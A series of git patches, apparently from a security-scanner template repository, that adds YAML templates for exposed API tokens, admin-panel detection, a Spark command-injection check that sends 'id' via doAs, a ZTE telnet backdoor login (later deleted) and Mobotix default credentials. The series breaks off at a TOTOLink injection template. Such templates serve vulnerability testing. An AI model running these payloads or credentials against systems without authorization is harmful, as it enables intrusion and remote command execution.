From c4d5c18dd6a2a989f4281a4d2a79363cb6559cb5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 13:27:08 +0530 Subject: [PATCH 0001/1133] Create zonkafeedback-api-token.yaml --- .../zonkafeedback/zonkafeedback-api-token.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml diff --git a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml new file mode 100644 index 0000000000..0858cc1ac0 --- /dev/null +++ b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml @@ -0,0 +1,17 @@ +id: zonkafeedback-api-token + +info: + name: Zonkafeedback Api Token + author: ritikchaddha + severity: info + tags: exposure,token,zonkafeedback,zonka + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '[A-Za-z0-9]{36})' From 14fcd15f930b0615e24578728510a6406c29848d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 13:28:38 +0530 Subject: [PATCH 0002/1133] Update zonkafeedback-api-token.yaml --- exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml index 0858cc1ac0..03e1f6a176 100644 --- a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml +++ b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml @@ -14,4 +14,4 @@ requests: - type: regex part: body regex: - - '[A-Za-z0-9]{36})' + - '([A-Za-z0-9]{36})' From 7cdbfb930858370a70a8104c09b3552e96bb7ea9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 13:39:05 +0530 Subject: [PATCH 0003/1133] Create zipcodeapi-token.yaml --- .../tokens/zipcodeapi/zipcodeapi-token.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 exposures/tokens/zipcodeapi/zipcodeapi-token.yaml diff --git a/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml b/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml new file mode 100644 index 0000000000..fbaa9c5b42 --- /dev/null +++ b/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml @@ -0,0 +1,20 @@ +id: zipcodeapi-token + +info: + name: Zipcodeapi Token + author: ritikchaddha + severity: info + reference: + -http://www.zipcodeapi.com/API + -https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zipcodeapi/zipcodeapi.go + tags: exposure,token,zipcodeapi,api + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '([a-zA-Z0-9]{64})' From 5181dc5a93ca7fe1e587045e1299ba8a32d3f7ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 13:41:54 +0530 Subject: [PATCH 0004/1133] Update zonkafeedback-api-token.yaml --- exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml index 03e1f6a176..38d1c6c720 100644 --- a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml +++ b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml @@ -4,6 +4,9 @@ info: name: Zonkafeedback Api Token author: ritikchaddha severity: info + reference: + -https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zonkafeedback/zonkafeedback.go + -https://apidocs.zonkafeedback.com tags: exposure,token,zonkafeedback,zonka requests: From be5e73a4a0f76f0ff97201672fe918edcb100d8f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 14:19:12 +0530 Subject: [PATCH 0005/1133] Create zerobounce-api-token.yaml --- .../zerobounce/zerobounce-api-token.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 exposures/tokens/zerobounce/zerobounce-api-token.yaml diff --git a/exposures/tokens/zerobounce/zerobounce-api-token.yaml b/exposures/tokens/zerobounce/zerobounce-api-token.yaml new file mode 100644 index 0000000000..e1526589a9 --- /dev/null +++ b/exposures/tokens/zerobounce/zerobounce-api-token.yaml @@ -0,0 +1,20 @@ +id: zerobounce-api-token + +info: + name: Zerobounce API Token + author: ritikchaddha + severity: info + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go + - https://www.zerobounce.net/docs/email-validation-api-quickstart + tags: exposure,token,zerobounce,api + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '([a-z0-9]{32})' From b4e79a71ec6c326de89ef0365650d3ed1c8722b8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 14:47:16 +0530 Subject: [PATCH 0006/1133] Create zeplin-access-token.yaml --- .../tokens/zeplin/zeplin-access-token.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 exposures/tokens/zeplin/zeplin-access-token.yaml diff --git a/exposures/tokens/zeplin/zeplin-access-token.yaml b/exposures/tokens/zeplin/zeplin-access-token.yaml new file mode 100644 index 0000000000..6836f13fa2 --- /dev/null +++ b/exposures/tokens/zeplin/zeplin-access-token.yaml @@ -0,0 +1,19 @@ +id: zeplin-access-token +info: + name: Zeplin Access Token + author: ritikchaddha + severity: info + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go + - https://app.zeplin.io/profile/developer + tags: exposure,token,zeplin + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '([a-zA-Z0-9-.]{350,400})' From ca867aa163febcc3292677ea99ca6135b694c81d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Apr 2022 15:02:23 +0530 Subject: [PATCH 0007/1133] Update zerobounce-api-token.yaml --- exposures/tokens/zerobounce/zerobounce-api-token.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/zerobounce/zerobounce-api-token.yaml b/exposures/tokens/zerobounce/zerobounce-api-token.yaml index e1526589a9..0b2dc58a9d 100644 --- a/exposures/tokens/zerobounce/zerobounce-api-token.yaml +++ b/exposures/tokens/zerobounce/zerobounce-api-token.yaml @@ -4,9 +4,9 @@ info: name: Zerobounce API Token author: ritikchaddha severity: info - reference: - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go - - https://www.zerobounce.net/docs/email-validation-api-quickstart + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go + - https://www.zerobounce.net/docs/email-validation-api-quickstart tags: exposure,token,zerobounce,api requests: From 7b96b95ce1be9e46ad2b0a2a2d9314845abf70d5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Apr 2022 15:03:08 +0530 Subject: [PATCH 0008/1133] Update zipcodeapi-token.yaml --- exposures/tokens/zipcodeapi/zipcodeapi-token.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml b/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml index fbaa9c5b42..eb48e32fda 100644 --- a/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml +++ b/exposures/tokens/zipcodeapi/zipcodeapi-token.yaml @@ -4,9 +4,9 @@ info: name: Zipcodeapi Token author: ritikchaddha severity: info - reference: - -http://www.zipcodeapi.com/API - -https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zipcodeapi/zipcodeapi.go + reference: + - http://www.zipcodeapi.com/API + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zipcodeapi/zipcodeapi.go tags: exposure,token,zipcodeapi,api requests: From ed343b69498c7b98096272fe36b8d25403626663 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 16:08:10 +0530 Subject: [PATCH 0009/1133] Create zenserp-api-key.yaml --- exposures/tokens/zenserp/zenserp-api-key.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/tokens/zenserp/zenserp-api-key.yaml diff --git a/exposures/tokens/zenserp/zenserp-api-key.yaml b/exposures/tokens/zenserp/zenserp-api-key.yaml new file mode 100644 index 0000000000..f851df7bfb --- /dev/null +++ b/exposures/tokens/zenserp/zenserp-api-key.yaml @@ -0,0 +1,18 @@ +id: zenserp-api-key +info: + name: Zenserp Api Key + author: ritikchaddha + severity: info + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenserp/zenserp.go + tags: exposure,token,zenserp,apikey + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '([0-9a-z-]{36})' From 7ec80c7421098067da9ec1a731877062a9021b0e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 16:38:11 +0530 Subject: [PATCH 0010/1133] Create zenscrape-api-key.yaml --- .../tokens/zenserp/zenscrape-api-key.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposures/tokens/zenserp/zenscrape-api-key.yaml diff --git a/exposures/tokens/zenserp/zenscrape-api-key.yaml b/exposures/tokens/zenserp/zenscrape-api-key.yaml new file mode 100644 index 0000000000..0e05d47a31 --- /dev/null +++ b/exposures/tokens/zenserp/zenscrape-api-key.yaml @@ -0,0 +1,18 @@ +id: zenscrape-api-key +info: + name: Zenscrape API Key + author: ritikchaddha + severity: info + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenserp/zenserp.go + tags: exposure,token,zenscrape,apikey + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - '([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})' From eefb696ae092ae92259da98f09b0cc4241c66c28 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Apr 2022 17:00:00 +0530 Subject: [PATCH 0011/1133] Update zenscrape-api-key.yaml --- exposures/tokens/zenserp/zenscrape-api-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/zenserp/zenscrape-api-key.yaml b/exposures/tokens/zenserp/zenscrape-api-key.yaml index 0e05d47a31..d53bccd3fb 100644 --- a/exposures/tokens/zenserp/zenscrape-api-key.yaml +++ b/exposures/tokens/zenserp/zenscrape-api-key.yaml @@ -4,7 +4,7 @@ info: author: ritikchaddha severity: info reference: - - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenserp/zenserp.go + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zenscrape/zenscrape.go tags: exposure,token,zenscrape,apikey requests: From 2fe0d62ca0bbe28fce2b4f280f09e021b145ff13 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Apr 2022 19:01:34 +0530 Subject: [PATCH 0012/1133] Update zonkafeedback-api-token.yaml --- .../tokens/zonkafeedback/zonkafeedback-api-token.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml index 38d1c6c720..ff6d60e682 100644 --- a/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml +++ b/exposures/tokens/zonkafeedback/zonkafeedback-api-token.yaml @@ -4,15 +4,16 @@ info: name: Zonkafeedback Api Token author: ritikchaddha severity: info - reference: - -https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zonkafeedback/zonkafeedback.go - -https://apidocs.zonkafeedback.com + reference: + - https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zonkafeedback/zonkafeedback.go + - https://apidocs.zonkafeedback.com tags: exposure,token,zonkafeedback,zonka - + requests: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body From e33369c9691ad1d95733bf964e6cb4182e6beb65 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Jul 2022 10:34:39 +0530 Subject: [PATCH 0013/1133] Create CVE-2022-33891.yaml --- cves/2022/CVE-2022-33891.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2022/CVE-2022-33891.yaml diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml new file mode 100644 index 0000000000..4242a68737 --- /dev/null +++ b/cves/2022/CVE-2022-33891.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-33891 +info: + name: Apache Spark UI - Command Injection + author: princechaddha + severity: high + description: | + The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. + reference: + - https://github.com/W01fh4cker/cve-2022-33891 + - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 + tags: cve,cve2019,grafana + +variables: + command: "id" + +requests: + - method: GET + path: + - "{{BaseURL}}/doAs?='{{command}}'" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "groups=" + + - type: status + status: + - 200 From 92c0cb5cb19cab42bf67ba5622b06b0bcada6413 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Jul 2022 10:37:17 +0530 Subject: [PATCH 0014/1133] Update CVE-2022-33891.yaml --- cves/2022/CVE-2022-33891.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 4242a68737..18e4d8ae1a 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/W01fh4cker/cve-2022-33891 - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 - tags: cve,cve2019,grafana + tags: cve,cve2022,apache,spark,authenticated variables: command: "id" From 03a27f30f0b3a5c7aa8adfbafe37f69e7ff1dd59 Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Wed, 14 Sep 2022 21:04:54 +0300 Subject: [PATCH 0015/1133] fix: Remove not needed part of the matching string --- exposed-panels/zte-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml index 5e82c398ee..bcb5631698 100644 --- a/exposed-panels/zte-panel.yaml +++ b/exposed-panels/zte-panel.yaml @@ -22,7 +22,7 @@ requests: - type: word part: body words: - - "ZTE Corporation. All rights reserved. " + - "ZTE Corporation. All rights reserved." - '
' condition: and From 5ac01d5c933471e21d05f10d5793d210866a1fdf Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Thu, 15 Sep 2022 12:45:07 +0300 Subject: [PATCH 0016/1133] chore: Add new template for ZTE telnet backdoor --- network/zte-backdoor.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/zte-backdoor.yaml diff --git a/network/zte-backdoor.yaml b/network/zte-backdoor.yaml new file mode 100644 index 0000000000..2c481393c2 --- /dev/null +++ b/network/zte-backdoor.yaml @@ -0,0 +1,29 @@ +id: zte-backdoor + +info: + name: Backdoor in some ZTE routers. + author: its0x08 + severity: high + description: | + Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell. + reference: | + references go here!!!!!!!!!!!!!1 + tags: zte,backdoor,unauth,telnet,iot + +network: + - host: + - "{{Hostname}}" + - "{{Host}}:23" + inputs: + - data: "root\r\n" + - data: "Zte521\r\n\r\n" + read: 1024 + + matchers: + - type: word + words: + - "BusyBox" + extractors: + - type: regex + regex: + - '[A-Z]{1,}[0-9]{3,4}' From 747aa7806146b0482238694c3ea0df2f22e9a0c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Sep 2022 15:54:15 +0530 Subject: [PATCH 0017/1133] Update zte-backdoor.yaml --- network/zte-backdoor.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/network/zte-backdoor.yaml b/network/zte-backdoor.yaml index 2c481393c2..3f8fde0397 100644 --- a/network/zte-backdoor.yaml +++ b/network/zte-backdoor.yaml @@ -6,16 +6,18 @@ info: severity: high description: | Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell. - reference: | - references go here!!!!!!!!!!!!!1 - tags: zte,backdoor,unauth,telnet,iot + reference: + - https://www.exploit-db.com/ghdb/7179 + tags: network,zte,backdoor,unauth,telnet,iot network: - host: - "{{Hostname}}" - "{{Host}}:23" + inputs: - data: "root\r\n" + - data: "Zte521\r\n\r\n" read: 1024 @@ -23,6 +25,7 @@ network: - type: word words: - "BusyBox" + extractors: - type: regex regex: From 14d786f327d1ddb5f053718f6bdecc6fdb53cce4 Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Fri, 16 Sep 2022 14:23:06 +0300 Subject: [PATCH 0018/1133] fix: Add extra regex to match version for newer devices --- exposed-panels/zte-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml index bcb5631698..7447d58cfd 100644 --- a/exposed-panels/zte-panel.yaml +++ b/exposed-panels/zte-panel.yaml @@ -18,11 +18,12 @@ requests: path: - "{{BaseURL}}" + stop-at-first-match: true matchers: - type: word part: body words: - - "ZTE Corporation. All rights reserved." + - "ZTE Corporation. All rights reserved. " - '' condition: and @@ -37,3 +38,4 @@ requests: group: 1 regex: - '
(.+)<\/font><\/div>' + - '(.+)<\/title>' From 11997c32cf91123235dd7ef687a051950ef52c32 Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Fri, 16 Sep 2022 17:19:53 +0300 Subject: [PATCH 0019/1133] fix: `mikrotik-routeros` template --- exposed-panels/mikrotik-routeros.yaml | 48 +++++++++++++++++++++++---- 1 file changed, 42 insertions(+), 6 deletions(-) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index 254984ed65..b2af2f9b46 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -2,7 +2,7 @@ id: mikrotik-routeros info: name: MikroTik RouterOS Login - author: gy741 + author: gy741, its0x08 severity: info reference: - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe @@ -12,14 +12,50 @@ requests: - method: GET path: - '{{BaseURL}}' + - '{{BaseURL}}/cfg' + - '{{BaseURL}}/graphs/' - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word + name: router + part: body words: - 'If this device is not in your possession, please contact your local network administrator' - - '.mikrotik.com' + - '<title>RouterOS router configuration page' condition: and - - type: status - status: - - 200 + + - type: word + name: router-old + part: body + words: + - 'mikrotik routeros > administration' + - 'Mikrotik Router' + - '<img src="/webcfg/' + - '<title>MikroTik RouterOS Managing Webpage' + condition: or + + - type: word + name: hotspot + part: body + words: + - 'Please log on to use the mikrotik hotspot service' + - 'mikrotik hotspot > login' + condition: and + + - type: word + name: mikrotik-httpproxy + part: header + words: + - "Server: mikrotik httpproxy" + + extractors: + - type: regex + group: 1 + regex: + - "

RouterOS (.+)

" + - '
mikrotik routeros (.[0-9.]+) configuration page
' + - 'routeros (.[0-9.]+) ' + - 'MikroTik RouterOS (.[0-9.]+)' + From 26469bcf8a18b23d9b70582898226965390adf4a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Sep 2022 23:46:00 +0530 Subject: [PATCH 0020/1133] fix lint --- exposed-panels/mikrotik-routeros.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik-routeros.yaml index b2af2f9b46..c3456886c0 100644 --- a/exposed-panels/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik-routeros.yaml @@ -58,4 +58,3 @@ requests: - '
mikrotik routeros (.[0-9.]+) configuration page
' - 'routeros (.[0-9.]+) ' - 'MikroTik RouterOS (.[0-9.]+)' - From 18a3982f9942ab8575ac80bc3637ed0f0a876c6a Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Mon, 19 Sep 2022 12:52:22 +0300 Subject: [PATCH 0021/1133] Delete zte-backdoor.yaml --- network/zte-backdoor.yaml | 32 -------------------------------- 1 file changed, 32 deletions(-) delete mode 100644 network/zte-backdoor.yaml diff --git a/network/zte-backdoor.yaml b/network/zte-backdoor.yaml deleted file mode 100644 index 3f8fde0397..0000000000 --- a/network/zte-backdoor.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: zte-backdoor - -info: - name: Backdoor in some ZTE routers. - author: its0x08 - severity: high - description: | - Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell. - reference: - - https://www.exploit-db.com/ghdb/7179 - tags: network,zte,backdoor,unauth,telnet,iot - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:23" - - inputs: - - data: "root\r\n" - - - data: "Zte521\r\n\r\n" - read: 1024 - - matchers: - - type: word - words: - - "BusyBox" - - extractors: - - type: regex - regex: - - '[A-Z]{1,}[0-9]{3,4}' From bc3ec5803d06d123cb665dded072515b1cf0350e Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:37:06 +0300 Subject: [PATCH 0022/1133] fix: Enhanced HikVision detection template --- .../hikvision-panel.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) rename technologies/hikvision-detection.yaml => exposed-panels/hikvision-panel.yaml (58%) diff --git a/technologies/hikvision-detection.yaml b/exposed-panels/hikvision-panel.yaml similarity index 58% rename from technologies/hikvision-detection.yaml rename to exposed-panels/hikvision-panel.yaml index 21a9b4eae8..4df37624fd 100644 --- a/technologies/hikvision-detection.yaml +++ b/exposed-panels/hikvision-panel.yaml @@ -2,26 +2,35 @@ id: hikvision-detection info: name: Hikvision Detection - author: pdteam + author: pdteam, its0x08 severity: info tags: tech,hikvision requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/favicon.ico" - "{{BaseURL}}/doc/page/login.asp" - "{{BaseURL}}/doc/script/common.js" + - "{{BaseURL}}/doc/xml/Languages.xml" stop-at-first-match: true matchers-condition: or matchers: - type: word - name: footer + part: body words: - "Hikvision Digital Technology" + - '' + + - type: word + name: server + part: header + words: + - "Hikvision-Webs" - type: dsl name: favicon dsl: - - "status_code==200 && ('999357577' == mmh3(base64_py(body)))" + - "'999357577' == mmh3(base64_py(body))" From 4ddf56ac4b32acb4a4ba8603f685a12e97d7fb26 Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:40:11 +0300 Subject: [PATCH 0023/1133] Delete hikvision-panel.yaml --- exposed-panels/hikvision-panel.yaml | 36 ----------------------------- 1 file changed, 36 deletions(-) delete mode 100644 exposed-panels/hikvision-panel.yaml diff --git a/exposed-panels/hikvision-panel.yaml b/exposed-panels/hikvision-panel.yaml deleted file mode 100644 index 4df37624fd..0000000000 --- a/exposed-panels/hikvision-panel.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: hikvision-detection - -info: - name: Hikvision Detection - author: pdteam, its0x08 - severity: info - tags: tech,hikvision - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/favicon.ico" - - "{{BaseURL}}/doc/page/login.asp" - - "{{BaseURL}}/doc/script/common.js" - - "{{BaseURL}}/doc/xml/Languages.xml" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - "Hikvision Digital Technology" - - '' - - - type: word - name: server - part: header - words: - - "Hikvision-Webs" - - - type: dsl - name: favicon - dsl: - - "'999357577' == mmh3(base64_py(body))" From 8550ff7c5471e9176bf6d34dc834e453f3d5464a Mon Sep 17 00:00:00 2001 From: 0x08 <15280042+its0x08@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:51:43 +0300 Subject: [PATCH 0024/1133] Create hikvision-panel.yaml --- exposed-panels/hikvision-panel.yaml | 36 +++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposed-panels/hikvision-panel.yaml diff --git a/exposed-panels/hikvision-panel.yaml b/exposed-panels/hikvision-panel.yaml new file mode 100644 index 0000000000..ffa8821b1a --- /dev/null +++ b/exposed-panels/hikvision-panel.yaml @@ -0,0 +1,36 @@ +id: hikvision-panel + +info: + name: Hikvision panel + author: pdteam, its0x08 + severity: info + tags: tech,hikvision + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/doc/page/login.asp" + - "{{BaseURL}}/doc/script/common.js" + - "{{BaseURL}}/doc/xml/Languages.xml" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Hikvision Digital Technology" + - '' + + - type: word + name: server + part: header + words: + - "Hikvision-Webs" + + - type: dsl + name: favicon + dsl: + - "'999357577' == mmh3(base64_py(body))" From 8359e9ee920473eba86d0200c3ac4bd2a7d54c17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Agust=C3=ADn=20Dom=C3=A9nech?= Date: Thu, 6 Oct 2022 03:13:33 -0400 Subject: [PATCH 0025/1133] Added mobotix-default-login Template --- .../mobotix/mobotix-default-login.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 default-logins/mobotix/mobotix-default-login.yaml diff --git a/default-logins/mobotix/mobotix-default-login.yaml b/default-logins/mobotix/mobotix-default-login.yaml new file mode 100644 index 0000000000..0fe57ee741 --- /dev/null +++ b/default-logins/mobotix/mobotix-default-login.yaml @@ -0,0 +1,33 @@ +id: mobotix-default-credentials + +info: + name: Mobotix Webcam Default Admin Credentials + author: robotshell + severity: high + description: Mobotix Camera default admin login credentials. + reference: + - https://www.mobotix.com/sites/default/files/2020-01/mx_RM_CameraSoftwareManual_en_200131.pdf + classification: + cwe-id: CWE-798 + tags: mobotix,default-login + +requests: + - raw: + - | + GET /control/userimage.html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46bWVpbnNt + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '!-- form button "Admin Menu" -->' + - '' + - '' + From b60bbd72315a39e918ac2bc798e0fa9be6b40940 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Oct 2022 15:43:33 +0530 Subject: [PATCH 0026/1133] Update mobotix-default-login.yaml --- .../mobotix/mobotix-default-login.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/default-logins/mobotix/mobotix-default-login.yaml b/default-logins/mobotix/mobotix-default-login.yaml index 0fe57ee741..aaac084fc1 100644 --- a/default-logins/mobotix/mobotix-default-login.yaml +++ b/default-logins/mobotix/mobotix-default-login.yaml @@ -9,6 +9,8 @@ info: - https://www.mobotix.com/sites/default/files/2020-01/mx_RM_CameraSoftwareManual_en_200131.pdf classification: cwe-id: CWE-798 + metadata: + shodan-query: title:"Mobotix" tags: mobotix,default-login requests: @@ -20,14 +22,19 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - '!-- form button "Admin Menu" -->' - '' - '' - + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 From 0e9381f92c34cf58abb6ccf421f39e6a2e1e0c9f Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 5 Nov 2022 21:21:49 +0900 Subject: [PATCH 0027/1133] Create CVE-2022-25082 TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. Signed-off-by: GwanYeong Kim --- cves/2022/CVE-2022-25082.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-25082.yaml diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml new file mode 100644 index 0000000000..73b7b3ecec --- /dev/null +++ b/cves/2022/CVE-2022-25082.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-25082 + +info: + name: TOTOLink - Unauthenticated Command Injection + author: gy741 + severity: 